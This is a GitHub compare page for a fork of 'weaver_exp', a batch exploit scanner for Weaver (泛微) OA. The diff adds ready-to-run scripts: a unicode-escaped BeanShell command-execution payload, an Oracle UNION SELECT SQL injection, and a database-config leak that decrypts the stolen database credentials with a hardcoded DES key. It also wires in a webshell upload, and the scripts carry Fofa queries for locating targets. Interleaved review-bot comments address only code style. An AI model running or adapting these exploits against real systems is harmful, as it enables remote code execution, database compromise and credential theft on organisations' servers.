base repository: haotiku/weaver_exp
base: master
head repository: QKioi/weaver_exp
compare: master
  • 6 commits
  • 10 files changed
  • 1 contributor

Commits on Jun 28, 2021

  1. Add Bsh_RCE.py

    z1un committed Jun 28, 2021
    cd36f04 View commit details
  2. Fix some bugs

    z1un committed Jun 28, 2021
    8a85bbe View commit details
  3. Add WorkflowCenterTreeData_Sql

    z1un committed Jun 28, 2021
    c28a811 View commit details
  4. Add E_Cology_Database_Leak

    z1un committed Jun 28, 2021
    a3f5f60 View commit details
  5. Fix Bugs

    z1un committed Jun 28, 2021
    c158ca1 View commit details
  6. Fix Bugs

    z1un committed Jun 28, 2021
    ff34c94 View commit details
24 changes: 18 additions & 6 deletions README.md
@@ -7,31 +7,38 @@
泛微OA V8前台Sql注入
泛微OA WorkflowServiceXml RCE
泛微OA WorkflowServiceXml RCE CNVD-2019-32204
泛微OA weaver.common.Ctrl 任意文件上传
泛微OA Bsh RCE
泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
泛微OA E-Cology 数据库配置信息泄漏
```
泛微OA V9 任意文件上传(未完成,测试ing)

先写了这些,也欢迎补充~

其中`/poc`下的利用脚本均可独立使用。

##### Usage:
```bash
python3 poc.py url
```

##### Usage:

```bash
python3 main.py -f filename

python3 main.py -u url
```



![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010147963.png)

![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010645469.png)



## 参考

https://ailiqun.xyz/2021/05/02/%E6%B3%9B%E5%BE%AEOA-%E5%89%8D%E5%8F%B0GetShell%E5%A4%8D%E7%8E%B0/
@@ -40,3 +47,8 @@ http://wiki.peiqi.tech/

https://www.o2oxy.cn/3561.html

https://github.com/Henry4E36/weaverSQL

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak


29 changes: 25 additions & 4 deletions main.py
@@ -4,8 +4,11 @@
import argparse
import time
from pyfiglet import Figlet
# from multiprocessing import Pool

from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql,Weaver_Common_Ctrl_Upload

from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql, \
Weaver_Common_Ctrl_Upload, Bsh_RCE, WorkflowCenterTreeData_Sql, E_Cology_Database_Leak

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
@@ -78,6 +81,20 @@ def check(url):
if Weaver_Common_Ctrl_Upload.GetShell(url) == 'ok':
result('泛微OA weaver.common.Ctrl 任意文件上传', url)

# 泛微Bsh RCE
print(now_time() + info() + '正在检测泛微OA Bsh RCE漏洞')
if Bsh_RCE.Check(url) == 'ok':
result('泛微OA Bsh RCE', url)

# 泛微OA WorkflowCenterTreeData接口SQL注入
print(now_time() + info() + '正在检测泛微OA WorkflowCenterTreeData接口SQL注入漏洞')
if WorkflowCenterTreeData_Sql.exploit(url) == 'ok':
result('泛微OA WorkflowCenterTreeData接口SQL注入', url)

# 泛微OA e-cology 数据库配置信息泄漏
print(now_time() + info() + '正在检测泛微OA e-cology 数据库配置信息泄漏漏洞')
if E_Cology_Database_Leak.checkVulUrl(url) == 'ok':
result('泛微OA 数据库配置信息泄漏漏洞', url)


if __name__ == '__main__':
@@ -90,6 +107,7 @@ def check(url):
os.path.basename(__file__))
args = parser.parse_args()
if args.file:
# pool = Pool(processes=10)
f = open(args.file, 'r')
urls = f.readlines()
for url in urls:
@@ -98,15 +116,18 @@ def check(url):
url += '/'
if url[:4] != 'http':
url = 'http://' + url
# pool.apply_async(check, args=(url,))
check(url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
f.close()
# pool.close()
# pool.join()
# 扫描结果
print(now_time() + info() + '扫描已完成, 若有漏洞将保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')

elif args.url:
check(args.url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
print(now_time() + info() + '扫描已完成, 若有漏洞将保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')

else:
print(Usage)
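Review bot: The file handle opened with `f = open(args.file, 'r')` (the line before `urls = f.readlines()`) is only released by the `f.close()` placed after the loop, so any exception escaping `check()` leaks it, and the file is decoded with the platform default encoding. Replace the open/readlines/close triple with `with open(args.file, 'r', encoding='utf-8') as f:` followed by `    urls = f.readlines()` and drop the explicit `f.close()`; the loop can then stay outside the `with`. The `if __name__ == '__main__':` block these hunks belong to starts and ends outside the visible hunks. The commented-out `Pool` lines added in the same change are dead code and would be better tracked in an issue than left inline.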
69 changes: 69 additions & 0 deletions poc/Bsh_RCE.py
@@ -0,0 +1,69 @@
# -*- coding: utf-8 -*-
# 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
# Fofa: app="泛微-协同办公OA"

import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Content-Type': 'application/x-www-form-urlencoded',
}


def Check(target):
target += "weaver/bsh.servlet.BshServlet"
payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw"""
try:
requests.packages.urllib3.disable_warnings()
request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False)
if ";</script>" not in request.text:
if "Login.jsp" not in request.text:
if "Error" not in request.text:
if "<head>" not in request.text:
print(now_time() + info() + '存在Beanshell RCE漏洞: {}'.format(target))
print(now_time()+info()+'可Post手动传值测试: {}'.format(payload))
print(now_time() + success() + 'whoami: {}'.format(request.text.strip('\n')))
return 'ok'
else:
print(now_time()+warning()+"不存在Beanshell RCE漏洞")
except:

print(now_time() + error() + '未知错误')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
Check(url)
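Review bot: The bare `except:` at the end of `Check` also catches `KeyboardInterrupt` and `SystemExit`, so a Ctrl-C during a scan is reported as '未知错误' and swallowed instead of stopping the run; narrow it to `except requests.RequestException:` or at least `except Exception:`. The same bare `except:` appears in `checkVulUrl` in poc/E_Cology_Database_Leak.py (both the inner and the outer handler) and in `exploit` in poc/WorkflowCenterTreeData_Sql.py. The blank line directly after `except:` separates the clause from its body and should go. A one-line docstring would also help callers in main.py that compare the return value, e.g. `"""Probe target; return 'ok' on a positive response, otherwise None."""`.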
84 changes: 84 additions & 0 deletions poc/E_Cology_Database_Leak.py
@@ -0,0 +1,84 @@
# -*- coding: utf-8 -*-
# 泛微OA E-Cology 数据库配置信息泄漏
# Fofa: app="泛微-协同办公OA"

import pyDes
import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25'
}


def desdecode(secret_key, s):
cipherX = pyDes.des(' ')
cipherX.setKey(secret_key)
y = cipherX.decrypt(s)
return y


def checkVulUrl(url):
url += 'mobile/DBconfigReader.jsp'
try:
requests.packages.urllib3.disable_warnings()
res = requests.get(url=url, headers=headers, timeout=10, verify=False)
if res.status_code != 200:
print(now_time() + warning() + '不存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
elif res.status_code == 200:
print(now_time() + info() + '可能存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
res = res.content
try:
data = desdecode('1z2x3c4v5b6n', res.strip())
data = data.strip()
dbType = str(data).split(';')[0].split(':')[1]
dbUrl = str(data).split(';')[0].split(':')[2].split('//')[1]
dbPort = str(data).split(';')[0].split(':')[3]
dbName = str(data).split(';')[1].split(',')[0].split('=')[1]
dbUser = str(data).split(';')[1].split(',')[1].split('=')[1]
dbPass = str(data).split(';')[1].split(',')[2].split('=')[1]
print(now_time() + success() + url +
"\n DBType: {0}\n DBUrl: {1}\n DBPort: {2}\n DBName: {3}\n DBUser: {4}\n DBPass: {5}".format(
dbType, dbUrl, dbPort, dbName, dbUser, dbPass))
return 'ok'
except:
print(now_time() + warning() + 'DES解密失败, 可能默认密钥错误, 手动访问进行确认: {}'.format(url))
except:
print(now_time() + error() + '无法连接到目标')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
checkVulUrl(url)
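Review bot: In `checkVulUrl` the branch `elif res.status_code == 200:` is exactly the negation of the `if res.status_code != 200:` above it, so it should simply be `else:`; as written a reader has to check whether a third case exists. The six `str(data).split(';')` calls re-split the same string each time; splitting once into two named parts (e.g. `conn, creds = str(data).split(';')[:2]`) and indexing those would make the field extraction readable. `desdecode` has no docstring; something like `"""DES-decrypt s with secret_key via pyDes; presumably returns bytes."""` would document the helper (pyDes's return type is not visible here, so verify it).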
4 changes: 3 additions & 1 deletion poc/Weaver_Common_Ctrl_Upload.py
@@ -79,14 +79,16 @@ def GetShell(urllist):
print(now_time() + success() + '利用成功webshell地址为: ' + GetShellurl+'?cmd=')
return 'ok'
else:
print(now_time() + error() + '未找到webshell, 利用失败, 可换马重试')
print(now_time() + warning() + '未找到webshell, 利用失败, 可换马重试')
except:
print(now_time() + error() + '未知错误')


def main():
if (len(sys.argv) == 2):
url = sys.argv[1]
if url[-1] != '/':
url += '/'
GetShell(url)
else:
print("python3 {} http://xx.xx.xx.xx".format(sys.argv[0]))
66 changes: 66 additions & 0 deletions poc/WorkflowCenterTreeData_Sql.py
@@ -0,0 +1,66 @@
# -*- coding: utf-8 -*-
# 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
# Fofa: app="泛微-协同办公OA"

import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}


def exploit(url):
target = url + 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
payload = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"
try:
requests.packages.urllib3.disable_warnings()
res = requests.post(url=target, data=payload, headers=headers, verify=False, timeout=10)
res.encoding = res.apparent_encoding
if '[' in res.text:
print(now_time() + success() + '目标为oracle数据库, 可利用sqlmap进行进一步利用: {}'.format(target))
return 'ok'
else:
print(now_time() + warning() + '不存在泛微OA WorkflowCenterTreeData接口SQL注入')
except:
print(now_time() + error() + '未知错误')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
exploit(url)
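Review bot: The positive check in `exploit`, `if '[' in res.text:`, is a very loose heuristic — any page whose HTML or inline script contains a '[' (for example an error page) will be reported as a hit — and nothing in the code says so. Add a comment on that line such as `# loose heuristic: any '[' in the body counts as a hit; false positives are likely` so the caller in main.py knows how to weigh the result. A docstring on `exploit` stating the 'ok'/None return contract would match how main.py consumes it.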
Binary file not shown.
Binary file removed poc/__pycache__/E_Cology_V8_Sql.cpython-39.pyc
Binary file not shown.
Binary file not shown.
Binary file not shown.